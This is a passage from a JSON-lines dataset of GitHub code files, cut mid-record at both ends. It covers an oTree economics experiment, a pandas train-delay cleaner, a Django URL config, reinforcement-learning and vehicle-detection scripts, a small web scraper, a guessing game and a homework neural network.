_predicted_avg_outcome > self.constants.get_required_difference():\n                # BUYS\n                _option = enums.Option.BUY\n\n            # If there has been a trade\n            if _option != enums.Option.NO_TRADE:\n                return _option\n            else:\n                # No patterns have been found or criteria not met\n                return None\n        else:\n            return None\n","repo_name":"AndrewSkea/TradingBackTester","sub_path":"src/functions/percentage_similarity.py","file_name":"percentage_similarity.py","file_ext":"py","file_size_in_byte":3674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"13851937470","text":"from ._builtin import Page, WaitPage\nfrom otree.api import Currency as c, currency_range\nfrom .models import Constants, levenshtein, distance_and_ok\nfrom django.conf import settings\n\nimport random\n\nclass Introduction(Page):\n    form_model = 'player'\n    form_fields = ['spanish']\n    \"\"\"Description of the game: How to play and returns expected\"\"\"\n    pass\n\n\nclass Transcribe(Page):\n    form_model = 'player'\n    form_fields = ['transcribed_text']\n\n    # Don't display this Transcribe page if the \"transcription\" value in\n    # the dictionary representing this round in config.py is False\n    def is_displayed(self):\n        if (Constants.config[0][self.round_number - 1][\"transcription\"] == False):\n            return 
False\n\n # Don't display this Transcribe page for each player who has completed\n # the first transcription task\n for p in self.player.in_all_rounds():\n if(p.transcriptionDone):\n return False\n\n return True\n\n def vars_for_template(self):\n return {\n 'image_path': 'real_effort/paragraphs/{}.png'.format(2), \n 'reference_text': Constants.reference_texts[1],\n 'debug': settings.DEBUG,\n 'required_accuracy': 100 * (1 - Constants.allowed_error_rates[1]),\n }\n\n def transcribed_text_error_message(self, transcribed_text):\n \"\"\"Determines the player's transcription accuracy.\"\"\"\n\n reference_text = Constants.reference_texts[1]\n allowed_error_rate = Constants.allowed_error_rates[1]\n distance, ok = distance_and_ok(transcribed_text, reference_text,\n allowed_error_rate)\n if ok:\n self.player.levenshtein_distance = distance\n self.player.ratio = 1 - distance / Constants.maxdistance2\n else:\n if allowed_error_rate == 0:\n return \"The transcription should be exactly the same as on the image.\"\n else:\n return \"This transcription appears to contain too many errors.\"\n\n def before_next_page(self):\n \"\"\"Initialize payoff to have a default value of 0\"\"\"\n self.player.payoff = 0\n\n\nclass Transcribe2(Page):\n form_model = 'player'\n form_fields = ['transcribed_text2']\n\n def is_displayed(self):\n # Don't display this Transcribe page if the \"transcription\" value in\n # the dictionary representing this round in config.py is False\n if (Constants.config[0][self.round_number - 1][\"transcription\"] == False):\n self.player.ratio = 1\n return False\n\n # Don't display this Transcribe page for each player who has completed\n # the second transcription task\n for p in self.player.in_all_rounds():\n if(p.transcriptionDone): \n return False\n\n return True\n\n def vars_for_template(self):\n return {\n 'image_path': 'real_effort/paragraphs/{}.png'.format(1),\n 'reference_text': Constants.reference_texts[0],\n 'debug': settings.DEBUG,\n 'required_accuracy': 100 * (1 - Constants.allowed_error_rates[0]),\n }\n\n def before_next_page(self):\n \"\"\"Initialize payoff to have a default value of 0\"\"\"\n self.player.payoff = 0\n\n\nclass TranscribeResults(Page):\n form_model = 'player'\n form_fields = []\n\n def is_displayed(self):\n # Don't display the TranscribeResults page listing each player's transcription\n # accuracy (levenshtein value) if the \"transcription\" value in\n # the dictionary representing this round in config.py is False\n if (Constants.config[0][self.round_number - 1][\"transcription\"] == False):\n return False\n\n # Don't display this TranscribeResults page for each player who has completed\n # the second transcription task\n for p in self.player.in_all_rounds():\n if(p.transcriptionDone):\n return False\n\n return True\n\n\n def vars_for_template(self):\n table_rows = []\n config = Constants.config\n self.player.income = config[0][self.round_number - 1][\"end\"]\n\n for prev_player in self.player.in_all_rounds():\n # Income calculation done here\n if prev_player.transcribed_text == None:\n prev_player.transcribed_text = \"\"\n prev_player.levenshtein_distance = 0\n\n row = { \n 'round_number': prev_player.round_number,\n 'reference_text_length': len(Constants.reference_texts[1]),\n 'transcribed_text_length': len(prev_player.transcribed_text),\n 'distance': prev_player.levenshtein_distance,\n 'ratio': 1 - prev_player.levenshtein_distance / Constants.maxdistance2,\n }\n\n self.player.ratio = 1 - prev_player.levenshtein_distance / Constants.maxdistance2\n 
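# income for this round is scaled by each previous round's transcription accuracy\n            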
self.player.income *= self.player.ratio\n\n table_rows.append(row)\n\n return {'table_rows': table_rows}\n\n def before_next_page(self):\n # Disables transcription for the rest of the game\n self.player.transcriptionDone = True\n\n\nclass part2(Page):\n form_model = 'player'\n form_fields = ['contribution']\n\n def contribution_max(self):\n \"\"\"Dynamically sets the maximum amount of each player's income that he/she can report\"\"\"\n return self.player.income\n\n def vars_for_template(self):\n # If transcription mode is set to true for this round, set the player's income according\n # to their transcription accuracy\n if self.player.ratio == 1 and Constants.config[0][self.round_number - 1][\"transcription\"] == True:\n for p in self.player.in_all_rounds():\n if p.ratio < 1:\n self.player.ratio = p.ratio\n self.player.income *= self.player.ratio\n break\n\n config = Constants.config\n\n # Displays the tax as a percentage rather than as a decimal between 0 and 1\n self.player.ratio = round(self.player.ratio, 5)\n displaytax = config[0][self.round_number - 1][\"tax\"] * 100\n\n return {'ratio': self.player.ratio, 'income': self.player.income, 'tax': displaytax,\n 'flag': config[0][self.round_number - 1][\"transcription\"],\n 'mult': config[0][self.round_number - 1][\"multiplier\"]}\n\n\nclass resultsWaitPage(WaitPage):\n def after_all_players_arrive(self):\n config = Constants.config\n group = self.group\n players = group.get_players()\n\n \"\"\"\n contributions = [p.contribution * config[0][int(self.round_number - 1)][\"tax\"] for p in players]\n group.total_contribution = sum(contributions)\n group.total_earnings = config[0][self.round_number - 1][\"multiplier\"] * group.total_contribution\n group.individual_share = group.total_earnings / Constants.players_per_group\n\n for p in players:\n p.payoff = p.income - (config[0][int(self.round_number - 1)][\"tax\"] * p.contribution) + group.individual_share\n \"\"\"\n\n # Generate a random player ID to determine who will be the authority\n group.random_player = random.randint(1, Constants.players_per_group)\n print(\"random player id is\", group.random_player)\n\n pass\n\nclass Authority(Page):\n form_model = 'group'\n form_fields = ['authority_multiply']\n\n def is_displayed(self):\n config = Constants.config\n group = self.group\n\n mode_num = config[0][self.round_number - 1][\"mode\"]\n\n if (mode_num == 1 and self.player.id_in_group == group.random_player):\n return True\n\n def vars_for_template(self):\n config = Constants.config\n\n return {\n 'mult': config[0][self.round_number - 1][\"multiplier\"],\n }\n pass\nclass AuthorityInfo(Page):\n def is_displayed(self):\n config = Constants.config\n group = self.group\n\n mode_num = config[0][self.round_number - 1][\"mode\"]\n\n if (self.player.id_in_group == group.random_player):\n return False\n else:\n return True\n\n def vars_for_template(self):\n config = Constants.config\n group = self.group\n\n mode_num = config[0][self.round_number - 1][\"mode\"]\n if(mode_num == 1 and group.authority_multiply):\n decision = Constants.decisions[1] + \" \" + str(config[0][self.round_number - 1][\"multiplier\"]) + \".\"\n elif(mode_num == 1 and not group.authority_multiply):\n decision = Constants.decisions[0]\n elif(mode_num == 2 and not group.auth_appropriate):\n decision = Constants.decisions[1] + \" \" + str(config[0][self.round_number - 1][\"multiplier\"]) + \" .\"\n else:\n decision = Constants.decisions[1] + \" \" + str(config[0][self.round_number - 1][\"multiplier\"]) + Constants.decisions[2] + 
str(config[0][self.round_number - 1][\"tax\"] * 100) + Constants.decisions[3]\n\n return {\"decision\": decision}\n\n\n\n\n\n\n\n\nclass Authority2(Page):\n form_model = 'group'\n form_fields = ['auth_appropriate']\n\n def is_displayed(self):\n config = Constants.config\n group = self.group\n\n mode_num = config[0][self.round_number - 1][\"mode\"]\n\n if (mode_num == 2 and self.player.id_in_group == group.random_player):\n return True\n\n def vars_for_template(self):\n config = Constants.config\n\n displaytax = config[0][self.round_number - 1][\"tax\"] * 100\n\n return {\n 'mult': config[0][self.round_number - 1][\"multiplier\"],\n 'tax': displaytax\n }\n\n pass\n\n\nclass AuthorityWaitPage(WaitPage):\n def after_all_players_arrive(self):\n config = Constants.config\n group = self.group\n players = group.get_players()\n\n mode_num = config[0][self.round_number - 1][\"mode\"]\n\n # NOTE: the code below can definitely be refactored (get rid of duplicate code), but I just want to see if\n # the functionality is correct first\n if(mode_num == 1 and group.authority_multiply):\n contributions = [p.contribution * config[0][int(self.round_number - 1)][\"tax\"] for p in players]\n group.total_contribution = sum(contributions)\n group.total_earnings = config[0][self.round_number - 1][\"multiplier\"] * group.total_contribution\n group.individual_share = group.total_earnings / Constants.players_per_group\n\n for p in players:\n p.payoff = p.income - (config[0][int(self.round_number - 1)][\"tax\"] * p.contribution) + group.individual_share\n\n elif(mode_num == 1 and not group.authority_multiply):\n contributions = [p.contribution * config[0][int(self.round_number - 1)][\"tax\"] for p in players]\n group.total_contribution = sum(contributions)\n group.total_earnings = config[0][self.round_number - 1][\"multiplier\"] * group.total_contribution\n group.individual_share = group.total_earnings / Constants.players_per_group\n\n for p in players:\n p.payoff = p.income - (config[0][int(self.round_number - 1)][\"tax\"] * p.contribution) + group.individual_share\n\n elif(mode_num == 2 and not group.auth_appropriate):\n # same as content in first if statement block\n contributions = [p.contribution * config[0][int(self.round_number - 1)][\"tax\"] for p in players]\n group.total_contribution = sum(contributions)\n group.total_earnings = config[0][self.round_number - 1][\"multiplier\"] * group.total_contribution\n group.individual_share = group.total_earnings / Constants.players_per_group\n\n for p in players:\n p.payoff = p.income - (config[0][int(self.round_number - 1)][\"tax\"] * p.contribution) + group.individual_share\n # Mode 2, Authority 2, Button 2\n else:\n # contributions = [p.contribution for p in players]\n contributions = [p.contribution * config[0][int(self.round_number - 1)][\"tax\"] for p in players]\n # group.total_contribution = sum(contributions) * config[0][int(self.round_number - 1)][\"tax\"]\n group.total_contribution = sum(contributions)\n\n group.total_earnings = config[0][self.round_number - 1][\"multiplier\"] * group.total_contribution\n appropriation = config[0][int(self.round_number - 1)][\"tax\"] * group.total_earnings\n group.individual_share = group.total_earnings / Constants.players_per_group\n \n\n print(\"group.total_contribution after subtracting appropriation is: \", group.total_contribution)\n print(\"appropriation is: \", appropriation)\n print(\"group.total_earnings is: \", group.total_earnings)\n print(\"group.individual_share is: \", group.individual_share)\n\n for p in 
players:\n                if (p.id_in_group == group.random_player):\n                    p.payoff = p.income - (config[0][int(self.round_number - 1)][\"tax\"] * p.contribution) + group.individual_share\n                    p.payoff += appropriation\n                else:\n                    p.payoff = p.income - (config[0][int(self.round_number - 1)][\"tax\"] * p.contribution) + group.individual_share\n                    p.payoff -= appropriation / (len(players) - 1)\n\n        print(\"did authority decide to multiply: \", group.authority_multiply)\n\nclass TaxResults(Page):\n    def is_displayed(self):\n        # May cause a problem, may change to something more direct later\n        return self.player.payoff != 0\n\n    def vars_for_template(self):\n        share = self.group.total_earnings / Constants.players_per_group\n\n        return {\n            'total_earnings': self.group.total_earnings,\n            'player_earnings': share\n        }\n\n\npage_sequence = [Introduction, Transcribe2, Transcribe, TranscribeResults, part2, resultsWaitPage,\n                 Authority, Authority2, AuthorityWaitPage, AuthorityInfo, TaxResults]","repo_name":"Kimberley1012/tesis","sub_path":"real_effort/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":14068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"41313388814","text":"import pandas as pd\nimport numpy as np\n\nclass NJCleaner:\n    def __init__(self, path: str) -> None:\n        self.data = pd.read_csv(path)\n    def order_by_scheduled_time(self) -> pd.DataFrame:\n        # keep the sorted frame on the instance, otherwise prep_df loses the ordering\n        self.data = self.data.sort_values(by=[\"scheduled_time\"])\n        return self.data\n    def drop_columns_and_nan(self) -> pd.DataFrame:\n        nan = self.data.dropna().drop(['from', 'to'], axis=1)\n        self.data = nan\n        return self.data\n    def convert_date_to_day(self) -> pd.DataFrame:\n        self.data['day'] = pd.to_datetime(self.data['date']).dt.day_name()\n        drop = self.data.drop(['date'], axis=1)\n        self.data = drop\n        return self.data\n    def convert_scheduled_time_to_part_of_the_day(self) -> pd.DataFrame:\n        self.data[\"part_of_the_day\"] = pd.to_datetime(self.data['scheduled_time']).dt.hour.apply(lambda time: 'early_morning' if time >= 4 and time < 8\n                                                     else ('morning' if time >= 8 and time < 12\n                                                     else ('afternoon' if time >= 12 and time < 16\n                                                     else ('evening' if time >= 16 and time < 20\n                                                     else ('night' if time >= 20 and time < 24\n                                                     else 'late_night')))))\n\n        colum = self.data.drop(columns=['scheduled_time'])\n        self.data = colum\n        return self.data\n    def convert_delay(self) -> pd.DataFrame:\n        self.data['delay'] = self.data['delay_minutes'].apply(lambda delay: 0 if delay <= 5 else 1)\n        return self.data\n    def drop_unnecessary_columns(self) -> pd.DataFrame:\n        colum = self.data.drop(columns=['train_id', 'actual_time', 'delay_minutes'])\n        self.data = colum\n        return self.data\n    def save_first_60k(self, path: str):\n        sixtyk = self.data.iloc[:60000]\n        self.data = sixtyk\n        sixtyk.to_csv(path, index=False)\n    def prep_df(self, path: str):\n        self.order_by_scheduled_time()\n        self.drop_columns_and_nan()\n        self.convert_date_to_day()\n        self.convert_scheduled_time_to_part_of_the_day()\n        self.convert_delay()\n        self.drop_unnecessary_columns()\n        # save_first_60k already writes the CSV (without an index column)\n        self.save_first_60k(path)\n","repo_name":"karcagmate/BEVADAT2022232","sub_path":"HAZI/HAZI06/NJCleaner.py","file_name":"NJCleaner.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"73588805164","text":"from django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.conf import settings\n
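# registration is wired up below with Django's stock UserCreationForm rendered
# through a generic CreateView at 'auth/registration/'\n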
from django.contrib.auth.forms import UserCreationForm\nfrom django.urls import include, path, reverse_lazy\nfrom django.views.generic import CreateView\n\nhandler404 = 'pages.views.page_not_found'\nhandler500 = 'pages.views.server_error'\n\nurlpatterns = [\n    path('', include('blog.urls', namespace='blog')),\n    path('pages/', include('pages.urls', namespace='pages')),\n    path('admin/', admin.site.urls),\n    path('auth/', include('django.contrib.auth.urls')),\n    path(\n        'auth/registration/',\n        CreateView.as_view(\n            template_name='registration/registration_form.html',\n            form_class=UserCreationForm,\n            success_url=reverse_lazy('blog:index'),\n        ),\n        name='registration',\n    ),\n]\n\nif settings.DEBUG:\n    import debug_toolbar\n\n    # Add the URL patterns from the debug_toolbar app to urlpatterns:\n    urlpatterns += (path('__debug__/', include(debug_toolbar.urls)),)\n    urlpatterns += static(settings.MEDIA_URL,\n                          document_root=settings.MEDIA_ROOT)\n","repo_name":"mfilinov/django_sprint4","sub_path":"blogicum/blogicum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
{"seq_id":"7572570864","text":"import gym\nfrom RL_brain import ActorCritic\nimport torch\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nenv = gym.make('CartPole-v0')\nprint(env.action_space)\nprint(env.observation_space)\nprint(env.observation_space.high)\nprint(env.observation_space.low)\n\n\nRL = ActorCritic(\n    n_states=env.observation_space.shape[0],\n    n_actions=env.action_space.n)\n\ntotal_steps = 0\n# Set up lists to hold results\ntotal_rewards = []\nbatch_rewards = []\nbatch_actions = []\nbatch_states = []\nbatch_counter = 1\nbatch_size = 10\n\nfor i_episode in range(2000):\n\n    states = []\n    rewards = []\n    actions = []\n    final_r = 0\n    done = False\n    s_0 = env.reset()\n\n    while not done:\n        env.render()\n\n        action = RL.choose_action(s_0)\n        one_hot_action = [int(k == action) for k in range(env.action_space.n)]\n\n        s_1, r, done, info = env.step(action)\n        states.append(s_0)\n        rewards.append(r)\n        actions.append(one_hot_action)\n        s_0 = s_1\n\n        if done:\n            batch_rewards.extend(rewards)\n            batch_states.extend(states)\n            batch_actions.extend(actions)\n            batch_counter += 1\n            total_rewards.append(sum(rewards))\n\n            if batch_counter == batch_size:\n                RL.learn(batch_actions, batch_states, batch_rewards)\n                batch_rewards = []\n                batch_actions = []\n                batch_states = []\n                batch_counter = 1\n\n            avg_rewards = np.mean(total_rewards[-100:])\n            # Print running average\n            print(\"Ep: \", i_episode + 1, \"Average of last 100: %.4f\" % avg_rewards)\n\nRL.plot_cost()\n\nplt.plot(np.arange(len(total_rewards)), total_rewards)\nplt.ylabel('Cost')\nplt.xlabel('training steps')\nplt.show()\n\nenv.close()\n","repo_name":"shengfeng/reinforcement","sub_path":"Actor-Critic/run_CartPole.py","file_name":"run_CartPole.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
{"seq_id":"70550514605","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 08 15:20:34 2017\r\n\r\n@author: super\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nfrom collections import deque\r\nfrom scipy.ndimage.measurements import label\r\nfrom utils import draw_boxes\r\n\r\nclass VehicleFinder4Image(object):\r\n    \r\n    def __init__(self, windows, clf):\r\n        self.windows = windows\r\n        self.clf = clf\r\n    \r\n    def search_windows(self, img):\r\n        hot_windows = []\r\n        imgs = []\r\n        for window in self.windows:\r\n            
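# each window is ((x1, y1), (x2, y2)) in pixel coordinates; patches that are\r\n            # not already 64x64 get resized to the classifier's input size\r\n            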
(x1, y1), (x2, y2) = window\r\n            if (x2 - x1 != 64) or (y2 - y1 != 64):\r\n                img_win = cv2.resize(img[y1:y2, x1:x2], (64, 64))\r\n            else: img_win = img[y1:y2, x1:x2]\r\n            imgs.append(img_win)\r\n        predictions = self.clf.predict(imgs)\r\n        for i, window in enumerate(self.windows):\r\n            if predictions[i] == 1:\r\n                hot_windows.append(window)\r\n        return hot_windows\r\n    \r\n    def add_heat(self, heatmap, hot_windows):\r\n        for window in hot_windows:\r\n            (x1, y1), (x2, y2) = window\r\n            heatmap[y1:y2, x1:x2] += 1\r\n        return heatmap\r\n    \r\n    def heat_thresh(self, heatmap, thresh):\r\n        heatmap = cv2.resize(heatmap, (80, 45))\r\n        heatmap = cv2.resize(heatmap, (1280, 720))\r\n        heatmap[heatmap <= thresh] = 0\r\n        return heatmap\r\n    \r\n    def detect_vehicles_bboxes(self, heatmap):\r\n        labels = label(heatmap)\r\n        bboxes = []\r\n        for idx in range(1, labels[1]+1):\r\n            # Find pixels with each car_number label value\r\n            nonzero = (labels[0] == idx).nonzero()\r\n            # Identify x and y values of those pixels\r\n            nonzeroy = np.array(nonzero[0])\r\n            nonzerox = np.array(nonzero[1])\r\n            # Define a bounding box based on min/max x and y\r\n            bbox = ((np.min(nonzerox), np.min(nonzeroy)),\r\n                    (np.max(nonzerox), np.max(nonzeroy)))\r\n            bboxes.append(bbox)\r\n        return bboxes\r\n    \r\n    def apply(self, img):\r\n        hot_windows = self.search_windows(img)\r\n        heatmap = np.zeros_like(img[:,:,0], dtype=np.float32)\r\n        heatmap = self.add_heat(heatmap, hot_windows)\r\n        heatmap = self.heat_thresh(heatmap, 4)\r\n        vehicle_bboxes = self.detect_vehicles_bboxes(heatmap)\r\n        img_detected = draw_boxes(img, vehicle_bboxes)\r\n        return img_detected\r\n\r\n\r\nclass VehicleFinder4Video(VehicleFinder4Image):\r\n    \r\n    def __init__(self, windows, clf, n_recs=5):\r\n        super(VehicleFinder4Video, self).__init__(windows, clf)\r\n        self.n_recs = n_recs\r\n        self.heatmaps = deque(maxlen=self.n_recs)\r\n    \r\n    def apply(self, img):\r\n        hot_windows = self.search_windows(img)\r\n        heatmap = np.zeros_like(img[:,:,0], dtype=np.float32)\r\n        heatmap = self.add_heat(heatmap, hot_windows)\r\n        self.heatmaps.append(heatmap)\r\n        heatmap = np.mean(self.heatmaps, axis=0)\r\n        heatmap = self.heat_thresh(heatmap, 4)\r\n        vehicle_bboxes = self.detect_vehicles_bboxes(heatmap)\r\n        img_detected = draw_boxes(img, vehicle_bboxes)\r\n        return img_detected","repo_name":"AlphaLFC/CarND-Vehicle-Detection-P5","sub_path":"VehicleFinder/vehicle_finder.py","file_name":"vehicle_finder.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"31098388362","text":"from bs4 import BeautifulSoup\r\nimport requests\r\n\r\n\r\nsource = requests.get('http://switch.sjsu.edu/archive/wp/v28/index.html%3Fp=571.html').text\r\nsoup = BeautifulSoup(source, 'lxml')\r\nessay = soup.find('div',class_='content clearfix')\r\nsummary = essay.find_all('p')\r\nwith open(r\"C:\\Users\\zai_n\\Documents\\pythonbottexts\\article22.txt\", \"w\") as file:\r\n    # write the paragraph text itself, not the repr of the ResultSet\r\n    file.write(\"\\n\".join(p.get_text() for p in summary))\r\nprint(summary)\r\n","repo_name":"zainiba/The-Collective-Mind","sub_path":"workscrape.py","file_name":"workscrape.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"16760693651","text":"import random\n\n\ndef guess_the_number(n=None):\n    # a default of random.randint(1, 10) would be evaluated only once, at\n    # definition time, so the random number is drawn inside the function\n    if n is None:\n        n = random.randint(1, 10)\n    print(f\"the number is: {n!r}\")\n    tries = 0\n    while tries < 5:\n        guess = input(\"Guess the number? \")\n        try:\n            guessed_number = int(guess)\n        except ValueError:\n            print(\"Please enter a whole number.\")\n            continue\n        if guessed_number == n:\n            print(\"You won!\")\n            break\n        elif guessed_number < n:\n            print(\"The number is lower than the guess.\")\n        else:\n            print(\"The number is higher than the guess\")\n        tries += 1\n\n\nguess_the_number()\n","repo_name":"chaudhryjunaid/learn_python","sub_path":"guess_the_number.py","file_name":"guess_the_number.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"39113905101","text":"import numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport pickle\nfrom numpy.linalg import cholesky\n\n\nclass Dataset:\n    def __init__(self):\n        self.index = 0  # current position of the iterator over observations\n        self.obs = []  # for irisData is like [array(5.0,3.5,1.3,0.3), array(5.0,3.5,1.3,0.3), ... , ]\n        self.classes = []  # for irisData is [array(1,0,0), array(0,1,0), array(0,0,1), ... , ]\n        self.num_obs = 0  # number of observations\n        self.num_classes = 0  # number of classes, for irisData is 3\n        self.indices = []  # [0, 1, 2, 3, ... , num_obs - 1]\n\n    def __iter__(self):\n        return self\n\n    def __next__(self):\n        if self.index >= self.num_obs:\n            self.index = 0\n            raise StopIteration\n        else:\n            self.index += 1\n            return self.obs[self.index - 1], self.classes[self.index - 1]\n\n    def reset(self):\n        self.index = 0\n\n    def get_obs_with_target(self, k):\n        \"\"\"\n        from self.classes read the index_list, which the class is a particular k like (1,0,0)\n        :param k:\n        :return: list containing all the observations [array(5.0,3.5,1.3,0.3), array(4.9,3.0,1.4,0.2), ...]\n        with label k(1,0,0)\n        \"\"\"\n        # np.array_equal avoids the ambiguous truth value of an elementwise array comparison\n        index_list = [index for index, value in enumerate(self.classes) if np.array_equal(value, k)]\n        return [self.obs[i] for i in index_list]\n\n
    def get_all_obs_class(self, shuffle=False):\n        \"\"\"\n        shuffle indices, get all the pairs in that order.\n        :param shuffle:\n        :return: list containing all the observations with target [(array(5.0,3.5,1.3,0.3),array(1,0,0)),\n        (array(4.9,3.0,1.4,0.2),array(1,0,0)), ... ]\n        \"\"\"\n        if shuffle:\n            random.shuffle(self.indices)\n        return [(self.obs[i], self.classes[i]) for i in self.indices]\n\n    def get_mini_batches(self, batch_size, shuffle=False):\n        if shuffle:\n            random.shuffle(self.indices)\n\n        batches = [(self.obs[self.indices[n:n + batch_size]],\n                    self.classes[self.indices[n:n + batch_size]])\n                   for n in range(0, self.num_obs, batch_size)]\n        return batches\n\n\nclass IrisDataset(Dataset):\n    def __init__(self, path):\n        super(IrisDataset, self).__init__()\n        self.file_path = path\n        self.loadFile()\n        self.indices = np.arange(self.num_obs)\n\n    def loadFile(self):\n        # load a comma-delimited text file into an np matrix\n        resultList = []\n        f = open(self.file_path, 'r')\n        for line in f:\n            line = line.rstrip('\\n')  # \"1.0,2.0,3.0\"\n            sVals = line.split(',')  # [\"1.0\", \"2.0\", \"3.0\"]\n            fVals = list(map(np.float32, sVals))  # [1.0, 2.0, 3.0]\n            resultList.append(fVals)  # [[1.0, 2.0, 3.0] , [4.0, 5.0, 6.0]]\n        f.close()\n        data = np.asarray(resultList, dtype=np.float32)\n        self.obs = data[:, 0:4]\n        self.classes = data[:, 4:7]\n        self.num_obs = data.shape[0]\n        self.num_classes = 3\n\n\n# Activations\ndef tanh(x, deriv=False):\n    \"\"\"\n    d/dx tanh(x) = 1 - tanh^2(x)\n    during backpropagation when we need to go through the derivative we have already computed tanh(x),\n    therefore we pass tanh(x) to the function, which reduces the gradient to:\n    1 - tanh(x)^2\n    \"\"\"\n    if deriv:\n        # x is already tanh(x) here, so the derivative is 1 - x^2\n        return 1.0 - x * x\n    else:\n        return np.tanh(x)\n\n\ndef sigmoid(x, deriv=False):\n    \"\"\"\n    Task 2a\n    This function is the sigmoid function. It gets an input digit or vector and should return sigmoid(x).\n    The parameter \"deriv\" toggles between the sigmoid and the derivative of the sigmoid. Hint: In the case of the derivative\n    you can expect the input to be sigmoid(x) instead of x\n    :param x: type: np.array\n    :param deriv: type: Boolean\n    :return: type: np.array\n    \"\"\"\n    if deriv:\n        return x * (1 - x)\n    else:\n        return 1 / (1 + np.exp(-x))\n\n\ndef softmax(x, deriv=False):\n    \"\"\"\n    Task 2a\n    This function is the sigmoid function with a softmax applied. This will be used in the last layer of the network\n    The derivative will be the same as that of sigmoid(x)\n    :param x: type: np.array\n    :param deriv: type: Boolean\n    :return: type: np.array\n    \"\"\"\n    if deriv:\n        return x * (1 - x)\n    else:\n        exps = np.exp(x)\n        return exps / np.sum(exps)\n\n\nclass Layer:\n    def __init__(self, numInput, numOutput, activation=sigmoid, type='random'):\n        # print('Create layer with: {}x{} @ {}'.format(numInput, numOutput, activation))\n        self.ni = numInput\n        self.no = numOutput\n        self.weights = np.zeros(shape=[self.ni, self.no], dtype=np.float32)\n        self.biases = np.zeros(shape=[self.no], dtype=np.float32)\n        self.initializeWeights(type)\n\n        self.activation = activation\n        self.last_input = None  # used in backpropagation -- stores the input of this layer: y_{l-1}\n        self.last_output = None  # used in backpropagation -- output of the inference function: y_{l}\n        self.last_nodes = None  # pre-activation values z_{l}; stored for completeness but not read elsewhere\n\n    def initializeWeights(self, type):\n        \"\"\"\n        Task 2d\n        Initializes the weight matrix of the layer.
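(The 'random' branch below scales standard-normal draws by sqrt(2 / fan_in), i.e. He-style initialization.)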
Weights should be initialized to something other than 0.\n You can search the literature for possible initialization methods.\n :return: None\n \"\"\"\n if type == 'random':\n self.weights = np.random.randn(self.ni, self.no) * np.sqrt(2 / self.ni)\n self.biases = np.random.randn(self.no) * np.sqrt(2 / self.no)\n elif type == 'uniform':\n self.weights = np.random.uniform(-0.1, 0.1, size=(self.ni, self.no))\n self.biases = np.random.uniform(-0.1, 0.1, size=(self.no))\n elif type == 'gaussian':\n mean = 0\n cov = 1/(self.no * self.ni)\n print(mean, cov)\n self.weights = cov * np.random.standard_normal(size=(self.ni, self.no)) + mean\n self.biases = cov * np.random.standard_normal(self.no) + mean\n\n def inference(self, x):\n \"\"\"\n Task 2b\n This transforms the input x with the layers weights and bias and applies the activation function\n Hint: you should save the input and output of this function usage in the backpropagation\n :param x:\n :return: output of the layer\n :rtype: np.array\n \"\"\"\n self.last_input = x\n self.last_nodes = np.matmul(x.reshape(1, self.ni), self.weights) + self.biases\n self.last_output = self.activation(self.last_nodes)\n return self.last_output\n\n def backprop(self, error):\n \"\"\"\n Task 2c\n This function applied the backpropagation of the error signal. The Layer receives the error signal from the following\n layer or the network. You need to calculate the error signal for the next layer by backpropagating thru this layer.\n You also need to compute the gradients for the weights and bias.\n :param error:\n :return: error signal for the preceeding layer\n :return: gradients for the weight matrix\n :return: gradients for the bias\n :rtype: np.array\n \"\"\"\n gradients_weight = np.matmul(self.last_input.reshape(self.ni, 1), \\\n (error * sigmoid(self.last_output, True)).reshape(1, self.no))\n gradients_bias = error * sigmoid(self.last_output, True)\n error_signal = np.matmul((error * sigmoid(self.last_output, True)).reshape(1, self.no), self.weights.T)\n return gradients_weight, gradients_bias, error_signal\n\n\nclass BasicNeuralNetwork():\n def __init__(self, layer_sizes=[5], num_input=4, num_output=3, num_epoch=50, learning_rate=0.1,\n mini_batch_size=8, type_of_initial_weights='random'):\n self.layers = [] # to store the Objection layer. [layers[0](form input to hidden layer 1),\n # layers[1], ... ,\n # layers[len(self.ls)]]\n self.ls = layer_sizes # I consider this to be the size of different hidden layers [5,5,4] (len(self.ls) = 3),\n # don't contain the size of input and output layer. 
The whole structure should be 4 + [5, 5, 4] + 3;\n self.ni = num_input\n self.no = num_output\n self.lr = learning_rate\n self.num_epoch = num_epoch\n self.mbs = mini_batch_size\n self.type = type_of_initial_weights\n\n self.constructNetwork()\n\n def forward(self, x):\n \"\"\"\n Task 2b\n This function forwards a single feature vector through every layer and return the output of the last layer\n :param x: input feature vector\n :return: output of the network\n :rtype: np.array\n \"\"\"\n self.layers[0].inference(x)\n for i in range(1, len(self.ls)):\n self.layers[i].inference(self.layers[i - 1].last_output)\n output = self.layers[len(self.ls)].inference(self.layers[len(self.ls) - 1].last_output)\n return output\n\n def train(self, train_dataset, eval_dataset=None, monitor_ce_train=True, monitor_accuracy_train=True,\n monitor_ce_eval=True, monitor_accuracy_eval=True, monitor_plot='monitor.png'):\n ce_train_array = []\n ce_eval_array = []\n acc_train_array = []\n acc_eval_array = []\n for e in range(self.num_epoch):\n if self.mbs:\n self.mini_batch_SGD(train_dataset)\n else:\n self.online_SGD(train_dataset)\n print('Finished training epoch: {}'.format(e))\n if monitor_ce_train:\n ce_train = self.ce(train_dataset)\n ce_train_array.append(ce_train)\n print('CE (train): {}'.format(ce_train))\n if monitor_accuracy_train:\n 